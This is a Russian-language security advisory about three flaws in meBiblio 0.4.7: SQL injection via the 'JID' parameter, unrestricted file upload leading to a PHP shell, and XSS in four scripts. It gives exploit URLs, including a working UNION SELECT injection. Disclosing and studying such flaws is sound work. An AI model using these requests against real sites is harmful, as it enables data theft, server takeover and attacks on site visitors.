Программа: meBiblio 0.4.7

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, загрузить произвольные файлы на целевую систему и выполнить произвольный
SQL код в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «JID» сценарием journal_change_mask.inc.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.

Эксплоит:

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=
1%20union%20select%201,PACS_description,1,1%20FROM%20 pacs%20where%20PACS_ID=2

2) Уязвимость существует из-за ошибки в проверке входных данных в
uploader.html. Атакующий может загрузить произвольные файлы на целевую систему.

Пример:

Путь к загрузке сценариев: http://[target]/[path]/upload/uploader.html
Сценарий Shell: http://[target]/[path]/files/evil.php

3) Уязвимость существует из-за недостаточной обработки входных данных
сценариями dbadd.inc.php, add_journal_mask.inc.php, insert_mask.inc.php и
search_mask.inc.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии